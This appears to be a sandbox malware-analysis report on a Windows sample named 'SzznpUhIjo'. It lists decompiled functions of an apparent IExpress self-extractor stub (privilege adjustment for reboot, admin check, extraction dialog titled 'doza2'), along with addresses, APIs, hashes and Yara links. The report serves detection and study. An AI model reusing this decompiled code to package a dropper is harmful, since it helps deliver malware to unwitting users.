0x00405ff7
0x00405ffd
0x00406003
0x00406006
0x00406011
0x00406014
0x0040603d
0x00406016
0x00406018
0x00406019
0x0040601b
0x00406033
0x0040601d
0x00406020
0x00406029
0x00406022
0x00406022
0x00406022
0x00406020
0x0040601b
0x00406042
0x00406044
0x00406046
0x0040604a
0x00405ff7
0x00405fd5
0x00405fd8
0x00405fd8
0x00000000
0x00405e6b
0x00405e6b
0x00405e6e
0x00405f8b
0x00405f99
0x00000000
0x00405f9f
0x00405fa7
0x00405faf
0x00000000
0x00405fb1
0x00405fb3
0x00000000
0x00405fb5
0x00405fb7
0x00000000
0x00405fb9
0x00000000
0x00405fb9
0x00405fb7
0x00405fb3
0x00405faf
0x00405f8d
0x00405f8d
0x00405f8d
0x00405f8f
0x00405fc1
0x00405fc1
0x00405fc1
0x00000000
0x00405e74
0x00405e74
0x00405e77
0x00405ea0
0x00405ebd
0x00405f79
0x00000000
0x00405f7f
0x00405ec3
0x00405ec3
0x00405ecc
0x00405ed4
0x00405ed6
0x00405edc
0x00405edf
0x00405eea
0x00405eed
0x00405f3f
0x00405f40
0x00000000
0x00405eef
0x00405eef
0x00405ef2
0x00405f34
0x00405ef4
0x00405ef4
0x00405ef7
0x00405f2b
0x00000000
0x00405ef9
0x00405ef9
0x00405efc
0x00405f22
0x00000000
0x00405efe
0x00405eff
0x00405f02
0x00405f16
0x00405f04
0x00405f07
0x00405f0d
0x00405f46
0x00405f46
0x00405f09
0x00405f09
0x00405f09
0x00405f07
0x00405f02
0x00405efc
0x00405ef7
0x00405ef2
0x00405f4c
0x00405f4e
0x00405f50
0x00405f54
0x00405ed4
0x00405ea2
0x00405ea4
0x00405eaf
0x00405eaf
0x00000000
0x00405e79
0x00405e7d
0x00000000
0x00405e83
0x00405e83
0x00405e83
0x00405e85
0x00405e85
0x00405e8e
0x00000000
0x00405e94
0x00000000
0x00405e94
0x00405e8e
0x00405e7d
0x00405e77
0x00405e6e
0x00405e65
0x00405e5c
0x00000000
0x00000000
0x00000000
0x00405dd0
0x00405dd0
0x00405dd0
0x00000000
0x00405dd0
0x00405dce
0x00405dca
0x00405dba
0x00000000
0x00405d00
0x00405dd9
0x00405e04
0x004061fe
0x00405e0a
0x00405e0c
0x00405e17
0x00405e17
0x00405e04
0x00406200
0x00406200
0x00000000

APIs

CharNextA.USER32(?,00000000,?,?), ref: 00405CEE
GetModuleFileNameA.KERNEL32(00408B3E,00000104,00000000,?,?), ref: 00405DFC
CharUpperA.USER32(?), ref: 00405E3E
CharUpperA.USER32(-00000052), ref: 00405EE1
CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00405F6F
CharUpperA.USER32(?), ref: 00405FA7
CharUpperA.USER32(-0000004E), ref: 00406008
CharUpperA.USER32(?), ref: 004060AA
CloseHandle.KERNEL32(00000000,00401140,00000000,00000040,00000000), ref: 004061F1
ExitProcess.KERNEL32 ref: 004061F8

Strings

", xrefs: 0040612D
", xrefs: 00405D78
:, xrefs: 00406118
RegServer, xrefs: 00405F66

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
String ID: "$"$:$RegServer
API String ID: 1203814774-25366791
Opcode ID: 12c5ede7d68d4361fc545a2339da1b738b8745ab16626e3584918b88019fd5b3
Instruction ID: 3f853014ee877d2515ec6058bf9da6422bf58f592a71eae056d1935db408f189
Opcode Fuzzy Hash: 12c5ede7d68d4361fc545a2339da1b738b8745ab16626e3584918b88019fd5b3
Instruction Fuzzy Hash: B0D11771A04A455AEB358B388D487BB3B61EB16304F1440BBD8CAF62D1D67C8E82CF4D

Uniqueness

Uniqueness Score: -1.00%

Function 00401F90 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94
shutdownCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00401F90(signed int __ecx, void* __edi, void* __esi) {
				signed int _v8;
				int _v12;
				struct _TOKEN_PRIVILEGES _v24;
				void* _v28;
				void* __ebx;
				signed int _t13;
				int _t21;
				void* _t25;
				int _t28;
				signed char _t30;
				void* _t38;
				void* _t40;
				void* _t41;
				signed int _t46;

				_t41 = __esi;
				_t38 = __edi;
				_t30 = __ecx;
				if((__ecx & 0x00000002) != 0) {
					L12:
					if((_t30 & 0x00000004) != 0) {
						L14:
						if( *0x409a40 != 0) {
							_pop(_t30);
							_t44 = _t46;
							_t13 =  *0x408004; // 0xee8c6708
							_v8 = _t13 ^ _t46;
							_push(_t38);
							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
								_v24.PrivilegeCount = 1;
								_v12 = 2;
								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
								CloseHandle(_v28);
								_t41 = _t41;
								_push(0);
								if(_t21 != 0) {
									if(ExitWindowsEx(2, ??) != 0) {
										_t25 = 1;
									} else {
										_t37 = 0x4f7;
										goto L3;
									}
								} else {
									_t37 = 0x4f6;
									goto L4;
								}
							} else {
								_t37 = 0x4f5;
								L3:
								_push(0);
								L4:
								_push(0x10);
								_push(0);
								_push(0);
								E004044B9(0, _t37);
								_t25 = 0;
							}
							_pop(_t40);
							return E00406CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
						} else {
							_t28 = ExitWindowsEx(2, 0);
							goto L16;
						}
					} else {
						_t37 = 0x522;
						_t28 = E004044B9(0, 0x522, 0x401140, 0, 0x40, 4);
						if(_t28 != 6) {
							goto L16;
						} else {
							goto L14;
						}
					}
				} else {
					__eax = E00401EA7(__ecx);
					if(__eax != 2) {
						L16:
						return _t28;
					} else {
						goto L12;
					}
				}
			}

0x00401f90
0x00401f90
0x00401f93
0x00401f98
0x00401fa4
0x00401fa7
0x00401fc5
0x00401fcd
0x00401fdb
0x00401ee5
0x00401eea
0x00401ef1
0x00401ef4
0x00401f0c
0x00401f2e
0x00401f3a
0x00401f46
0x00401f4d
0x00401f58
0x00401f60
0x00401f61
0x00401f62
0x00401f75
0x00401f80
0x00401f77
0x00401f77
0x00000000
0x00401f77
0x00401f64
0x00401f64
0x00000000
0x00401f64
0x00401f0e
0x00401f0e
0x00401f13
0x00401f13
0x00401f14
0x00401f14
0x00401f16
0x00401f17
0x00401f1a
0x00401f1f
0x00401f1f
0x00401f86
0x00401f8f
0x00401fcf
0x00401fd3
0x00000000
0x00401fd3
0x00401fa9
0x00401fb4
0x00401fbb
0x00401fc3
0x00000000
0x00000000
0x00000000
0x00000000
0x00401fc3
0x00401f9a
0x00401f9a
0x00401fa2
0x00401fd9
0x00401fda
0x00000000
0x00000000
0x00000000
0x00401fa2

APIs

GetCurrentProcess.KERNEL32(00000028,?,?), ref: 00401EFB
OpenProcessToken.ADVAPI32(00000000), ref: 00401F02
ExitWindowsEx.USER32(00000002,00000000), ref: 00401FD3

Strings

SeShutdownPrivilege, xrefs: 00401F28

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: Process$CurrentExitOpenTokenWindows
String ID: SeShutdownPrivilege
API String ID: 2795981589-3733053543
Opcode ID: a0f9794e17a2a2020f6724e084c01d69b3cf6ca5b21d9c9fc784dfd5cae79e59
Instruction ID: 05ee149af66cfd38363aee8e227656f8d8a40696282e74b864cdd5f9a16ea6ab
Opcode Fuzzy Hash: a0f9794e17a2a2020f6724e084c01d69b3cf6ca5b21d9c9fc784dfd5cae79e59
Instruction Fuzzy Hash: 972176B1A402066ADB205BA19D4AF7F76B8EBC5714F10003AFB06F61E1D77D8811966E

Uniqueness

Uniqueness Score: -1.00%

Function 004017EE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E004017EE(intOrPtr* __ecx) {
				signed int _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				_Unknown_base(*)()* _v20;
				void* _v24;
				intOrPtr* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t14;
				_Unknown_base(*)()* _t20;
				long _t28;
				void* _t35;
				struct HINSTANCE__* _t36;
				signed int _t38;
				intOrPtr* _t39;

				_t14 =  *0x408004; // 0xee8c6708
				_v8 = _t14 ^ _t38;
				_v12 = 0x500;
				_t37 = __ecx;
				_v16.Value = 0;
				_v28 = __ecx;
				_t28 = 0;
				_t36 = LoadLibraryA("advapi32.dll");
				if(_t36 != 0) {
					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
					_v20 = _t20;
					if(_t20 != 0) {
						 *_t37 = 0;
						_t28 = 1;
						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
							_t37 = _t39;
							 *0x40a288(0, _v24, _v28);
							_v20();
							if(_t39 != _t39) {
								asm("int 0x29");
							}
							FreeSid(_v24);
						}
					}
					FreeLibrary(_t36);
				}
				return E00406CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
			}

0x004017f6
0x004017fd
0x00401805
0x0040180b
0x0040180d
0x00401815
0x00401818
0x00401820
0x00401824
0x0040182c
0x00401832
0x00401837
0x00401851
0x00401854
0x0040185d
0x00401862
0x0040186c
0x00401872
0x00401877
0x0040187e
0x0040187e
0x00401883
0x00401883
0x0040185d
0x0040188a
0x0040188a
0x004018a2

APIs

LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,004018DD), ref: 0040181A
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0040182C
AllocateAndInitializeSid.ADVAPI32(004018DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,004018DD), ref: 00401855
FreeSid.ADVAPI32(?,?,?,?,004018DD), ref: 00401883
FreeLibrary.KERNEL32(00000000,?,?,?,004018DD), ref: 0040188A

Strings

CheckTokenMembership, xrefs: 00401826
advapi32.dll, xrefs: 00401810

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: FreeLibrary$AddressAllocateInitializeLoadProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 4204503880-1888249752
Opcode ID: b6eebe71e7e9a4a03eb5822c34af0d440ca51bd5d564aa7407fe33a5010988da
Instruction ID: 1bd3692ccccaa6d7600f9d0fef09d9c741b671f303ea2036aeae9e10c16a3b59
Opcode Fuzzy Hash: b6eebe71e7e9a4a03eb5822c34af0d440ca51bd5d564aa7407fe33a5010988da
Instruction Fuzzy Hash: 35119631E00309ABDB14AFA4DD49ABFBB78EF48704F10417AFA01F2390DA748D148B99

Uniqueness

Uniqueness Score: -1.00%

Function 00406CF0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406CF0(char _a4) {

				SetUnhandledExceptionFilter(0);
				_t1 =  &_a4; // 0x406e26
				UnhandledExceptionFilter( *_t1);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x00406cf7
0x00406cfd
0x00406d00
0x00406d19

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00406E26,00401000), ref: 00406CF7
UnhandledExceptionFilter.KERNEL32(&n@,?,00406E26,00401000), ref: 00406D00
GetCurrentProcess.KERNEL32(C0000409,?,00406E26,00401000), ref: 00406D0B
TerminateProcess.KERNEL32(00000000,?,00406E26,00401000), ref: 00406D12

Strings

&n@, xrefs: 00406CFD

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID: &n@
API String ID: 3231755760-1310975225
Opcode ID: 22c3889b8df8b4eddd8845cfc6315da698cd09f06ff32b4e0fededf4a1367697
Instruction ID: 8cb3f13b78dd38f3b5ff2bea80fcfbd25beb2721d0077c0a29712bb6dc75ce69
Opcode Fuzzy Hash: 22c3889b8df8b4eddd8845cfc6315da698cd09f06ff32b4e0fededf4a1367697
Instruction Fuzzy Hash: 87D0C932000308BBDB002BE1EE0CE593F28EB48212F444020F719AA020CA3244618B5B

Uniqueness

Uniqueness Score: -1.00%

Function 00407155 Relevance: 7.6, APIs: 5, Instructions: 51
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407155() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0x408004; // 0xee8c6708
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0x408004 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0x408004 = _t39;
				}
				_t37 =  !_t36;
				 *0x408008 = _t37;
				return _t37;
			}

0x0040715d
0x00407161
0x00407165
0x00407178
0x00407182
0x0040718e
0x00407197
0x004071a0
0x004071b1
0x004071b8
0x004071c4
0x004071c7
0x004071cb
0x004071d5
0x004071da
0x004071da
0x004071dc
0x004071dc
0x004071e2
0x004071e5
0x004071ee

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00407182
GetCurrentProcessId.KERNEL32 ref: 00407191
GetCurrentThreadId.KERNEL32 ref: 0040719A
GetTickCount.KERNEL32 ref: 004071A3
QueryPerformanceCounter.KERNEL32(?), ref: 004071B8

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: 73efb9c50b0bf3b317bcf728cc34354e7744d0be7b20c68d67c6a204e722458a
Instruction ID: bfdbf58dd1f09331b2ef62520d31486fb2a653da5464fc683e2cb64336e098ce
Opcode Fuzzy Hash: 73efb9c50b0bf3b317bcf728cc34354e7744d0be7b20c68d67c6a204e722458a
Instruction Fuzzy Hash: CF112871D012089BCB10DBB8DB48A9EB7F4EB08314F65486AD801EB250EA349E148B49

Uniqueness

Uniqueness Score: -1.00%

Function 00406F40 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406F40() {

				SetUnhandledExceptionFilter(E00406EF0);
				return 0;
			}

0x00406f45
0x00406f4d

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00006EF0), ref: 00406F45

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 5af5f0cd64cddb50deb71555ddeccd90c44a21652ec31b6c76dfa555816b737e
Instruction ID: 378a529128b3a7e3d1065d46846c981e64e6a00043b7090dbb000319764bf95a
Opcode Fuzzy Hash: 5af5f0cd64cddb50deb71555ddeccd90c44a21652ec31b6c76dfa555816b737e
Instruction Fuzzy Hash: DD90027425130047D6101B70DE1991975A15B4D602B925475A012E84D5DB744060659A

Uniqueness

Uniqueness Score: -1.00%

Function 068800A3 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.341440182.0000000006880000.00000040.00000020.00020000.00000000.sdmp, Offset: 06880000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6880000_SzznpUhIjo.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 1b1e9dcfb235bb0478741522060ce83bc1ec8be7191768288a6b35bd89e1b567
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: B011A572340104AFD794DF59DCC1FAA73EAFB89234B298065ED08CB312E675E846C760

Uniqueness

Uniqueness Score: -1.00%

Function 00403210 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 188
windowCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00403210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __edi;
				void* _t6;
				void* _t10;
				int _t20;
				int _t21;
				int _t23;
				char _t24;
				long _t25;
				int _t27;
				int _t30;
				void* _t32;
				int _t33;
				int _t34;
				int _t37;
				int _t38;
				int _t39;
				void* _t42;
				void* _t46;
				CHAR* _t49;
				void* _t58;
				void* _t63;
				struct HWND__* _t64;

				_t64 = _a4;
				_t6 = _a8 - 0x10;
				if(_t6 == 0) {
					_push(0);
					L38:
					EndDialog(_t64, ??);
					L39:
					__eflags = 1;
					return 1;
				}
				_t42 = 1;
				_t10 = _t6 - 0x100;
				if(_t10 == 0) {
					E004043D0(_t64, GetDesktopWindow());
					SetWindowTextA(_t64, "doza2");
					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
					__eflags =  *0x409a40 - _t42; // 0x3
					if(__eflags == 0) {
						EnableWindow(GetDlgItem(_t64, 0x836), 0);
					}
					L36:
					return _t42;
				}
				if(_t10 == _t42) {
					_t20 = _a12 - 1;
					__eflags = _t20;
					if(_t20 == 0) {
						_t21 = GetDlgItemTextA(_t64, 0x835, 0x4091e4, 0x104);
						__eflags = _t21;
						if(_t21 == 0) {
							L32:
							_t58 = 0x4bf;
							_push(0);
							_push(0x10);
							_push(0);
							_push(0);
							L25:
							E004044B9(_t64, _t58);
							goto L39;
						}
						_t49 = 0x4091e4;
						do {
							_t23 =  *_t49;
							_t49 =  &(_t49[1]);
							__eflags = _t23;
						} while (_t23 != 0);
						__eflags = _t49 - 0x4091e5 - 3;
						if(_t49 - 0x4091e5 < 3) {
							goto L32;
						}
						_t24 =  *0x4091e5; // 0x3a
						__eflags = _t24 - 0x3a;
						if(_t24 == 0x3a) {
							L21:
							_t25 = GetFileAttributesA(0x4091e4);
							__eflags = _t25 - 0xffffffff;
							if(_t25 != 0xffffffff) {
								L26:
								E0040658A(0x4091e4, 0x104, 0x401140);
								_t27 = E004058C8(0x4091e4);
								__eflags = _t27;
								if(_t27 != 0) {
									__eflags =  *0x4091e4 - 0x5c;
									if( *0x4091e4 != 0x5c) {
										L30:
										_t30 = E0040597D(0x4091e4, 1, _t64, 1);
										__eflags = _t30;
										if(_t30 == 0) {
											L35:
											_t42 = 1;
											__eflags = 1;
											goto L36;
										}
										L31:
										_t42 = 1;
										EndDialog(_t64, 1);
										goto L36;
									}
									__eflags =  *0x4091e5 - 0x5c;
									if( *0x4091e5 == 0x5c) {
										goto L31;
									}
									goto L30;
								}
								_push(0);
								_push(0x10);
								_push(0);
								_push(0);
								_t58 = 0x4be;
								goto L25;
							}
							_t32 = E004044B9(_t64, 0x54a, 0x4091e4, 0, 0x20, 4);
							__eflags = _t32 - 6;
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0x4091e4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0x4091e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0x4091e4 - 0x5c;
						if( *0x4091e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0x409124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0x409a3c, 0x3e8, 0x408598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E00404224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0x4087a0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
						_t63 = 0x4c0;
						L9:
						E004044B9(_t64, _t63, 0, 0, 0x10, 0);
						_push(0);
						goto L38;
					}
					_t63 = 0x4b1;
					goto L9;
				}
				return 0;
			}

0x0040321b
0x0040321e
0x00403221
0x0040343c
0x0040343e
0x0040343f
0x00403445
0x00403447
0x00000000
0x00403447
0x00403229
0x0040322a
0x0040322f
0x004033ec
0x004033f7
0x00403410
0x00403416
0x0040341d
0x0040342d
0x0040342d
0x00403438
0x00000000
0x00403438
0x00403237
0x00403243
0x00403243
0x00403246
0x004032ee
0x004032f4
0x004032f6
0x004033d4
0x004033d6
0x004033db
0x004033dc
0x004033de
0x004033df
0x00403370
0x00403372
0x00000000
0x00403372
0x004032fc
0x00403301
0x00403301
0x00403303
0x00403304
0x00403304
0x0040330a
0x0040330d
0x00000000
0x00000000
0x00403313
0x00403318
0x0040331a
0x00403331
0x00403332
0x0040333a
0x0040333d
0x0040337c
0x00403388
0x0040338f
0x00403394
0x00403396
0x004033a4
0x004033ab
0x004033b6
0x004033be
0x004033c3
0x004033c5
0x00403435
0x00403437
0x00403437
0x00000000
0x00403437
0x004033c7
0x004033c9
0x004033cc
0x00000000
0x004033cc
0x004033ad
0x004033b4
0x00000000
0x00000000
0x00000000
0x004033b4
0x00403398
0x00403399
0x0040339b
0x0040339c
0x0040339d
0x00000000
0x0040339d
0x0040334c
0x00403351
0x00403354
0x00000000
0x00000000
0x0040335c
0x00403362
0x00403364
0x00000000
0x00000000
0x00403366
0x00403367
0x00403369
0x0040336a
0x0040336b
0x00000000
0x0040336b
0x0040331c
0x00403323
0x00000000
0x00000000
0x00403329
0x0040332b
0x00000000
0x00000000
0x00000000
0x0040332b
0x0040324c
0x0040324c
0x0040324f
0x004032c8
0x004032ce
0x00000000
0x004032ce
0x00403251
0x00403256
0x00000000
0x00000000
0x00403271
0x00403277
0x00403279
0x00403298
0x0040329d
0x0040329f
0x00000000
0x00000000
0x004032b0
0x004032b6
0x004032b8
0x00000000
0x00000000
0x004032be
0x00403280
0x00403289
0x0040328e
0x00000000
0x0040328e
0x0040327b
0x00000000
0x0040327b
0x00000000

APIs

LoadStringA.USER32(000003E8,00408598,00000200), ref: 00403271
GetDesktopWindow.USER32 ref: 004033E2
SetWindowTextA.USER32(?,doza2), ref: 004033F7
SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 00403410
GetDlgItem.USER32(?,00000836), ref: 00403426
EnableWindow.USER32(00000000), ref: 0040342D
EndDialog.USER32(?,00000000), ref: 0040343F

Strings

C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 004032E2, 004032E7, 00403331, 00403344, 0040335B, 0040336A
doza2, xrefs: 004033F1

Memory Dump Source

Source File: 00000000.00000002.340743892.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.340743892.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SzznpUhIjo.jbxd

Similarity

API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$doza2
API String ID: 2418873061-2567452070
Opcode ID: a63be94e471afe72671d35f27bbee40564260b20795c6bf122f1f2eabaccca5b
Instruction ID: 04d5c2a8db134baef30f0d0166c5a423a0fa44611ce3e06c27fd7db4b1552688
Opcode Fuzzy Hash: a63be94e471afe72671d35f27bbee40564260b20795c6bf122f1f2eabaccca5b
Instruction Fuzzy Hash: 7551E47034024176E7215F365D8CF7B2D5D9B86B56F10403AFA45BA2D1CABC8E02926E

Uniqueness

Uniqueness Score: -1.00%

Function 00402CAA Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 183
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00402CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t20;
				void* _t23;
				void* _t27;
				struct HRSRC__* _t31;
				intOrPtr _t33;
				void* _t43;
				void* _t48;
				signed int _t65;
				struct HINSTANCE__* _t66;
				signed int _t67;

				_t13 =  *0x408004; // 0xee8c6708
				_v8 = _t13 ^ _t67;
				_t65 = 0;
				_t66 = __ecx;
				_t48 = __edx;
				 *0x409a3c = __ecx;
				memset(0x409140, 0, 0x8fc);
				memset(0x408a20, 0, 0x32c);
				memset(0x4088c0, 0, 0x104);
				 *0x4093ec = 1;
				_t20 = E0040468F("TITLE", 0x409154, 0x7f);
				if(_t20 == 0 || _t20 > 0x80) {
					_t64 = 0x4b1;
					goto L32;
				} else {
					_t27 = CreateEventA(0, 1, 1, 0);
					 *0x40858c = _t27;
					SetEvent(_t27);
					_t64 = 0x409a34;
					if(E0040468F("EXTRACTOPT", 0x409a34, 4) != 0) {
						if(( *0x409a34 & 0x000000c0) == 0) {
							L12:
							 *0x409120 =  *0x409120 & _t65;
							if(E00405C9E(_t48, _t48, _t65, _t66) != 0) {
								if( *0x408a3a == 0) {
									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
									if(_t31 != 0) {
										_t65 = LoadResource(_t66, _t31);
									}
									if( *0x408184 != 0) {
										__imp__#17();
									}
									if( *0x408a24 == 0) {
										_t57 = _t65;
										if(E004036EE(_t65) == 0) {
											goto L33;
										} else {
											_t33 =  *0x409a40; // 0x3
											_t48 = 1;
											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
												if(( *0x409a34 & 0x00000100) == 0 || ( *0x408a38 & 0x00000001) != 0 || E004018A3(_t64, _t66) != 0) {
													goto L30;
												} else {
													_t64 = 0x7d6;
													if(E00406517(_t57, 0x7d6, _t34, E004019E0, 0x547, 0x83e) != 0x83d) {
														goto L33;
													} else {
														goto L30;
													}
												}
											} else {
												L30:
												_t23 = _t48;
											}
										}
									} else {
										_t23 = 1;
									}
								} else {
									E00402390(0x408a3a);
									goto L33;
								}
							} else {
								_t64 = 0x520;
								L32:
								E004044B9(0, _t64, 0, 0, 0x10, 0);
								goto L33;
							}
						} else {
							_t64 =  &_v268;
							if(E0040468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
								goto L3;
							} else {
								_t43 = CreateMutexA(0, 1,  &_v268);
								 *0x408588 = _t43;
								if(_t43 == 0 || GetLastError() != 0xb7) {
									goto L12;
								} else {
									if(( *0x409a34 & 0x00000080) == 0) {
										_t64 = 0x524;
										if(E004044B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
											goto L12;
										} else {
											goto L11;
										}
									} else {
										_t64 = 0x54b;
										E004044B9(0, 0x54b, "doza2", 0, 0x10, 0);
										L11:
										CloseHandle( *0x408588);
										 *0x409124 = 0x800700b7;
										goto L33;
									}
								}
							}
						}
					} else {
						L3:
						_t64 = 0x4b1;
						E004044B9(0, 0x4b1, 0, 0, 0x10, 0);
						 *0x409124 = 0x80070714;
						L33:
						_t23 = 0;
					}
				}
				return E00406CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
			}

0x00402cb5
0x00402cbc
0x00402cc7
0x00402cc9
0x00402cd1
0x00402cd3
0x00402cd9
0x00402ce9
0x00402cf9
0x00402d0e
0x00402d15
0x00402d1c
0x00402ef3
0x00000000
0x00402d2d
0x00402d34
0x00402d3b
0x00402d40
0x00402d48
0x00402d59
0x00402d84
0x00402e1f
0x00402e1f
0x00402e2e
0x00402e41
0x00402e5a
0x00402e62
0x00402e6c
0x00402e6c
0x00402e75
0x00402e77
0x00402e77
0x00402e84
0x00402e8b
0x00402e94
0x00000000
0x00402e96
0x00402e96
0x00402e9e
0x00402ea2
0x00402eba
0x00000000
0x00402ece
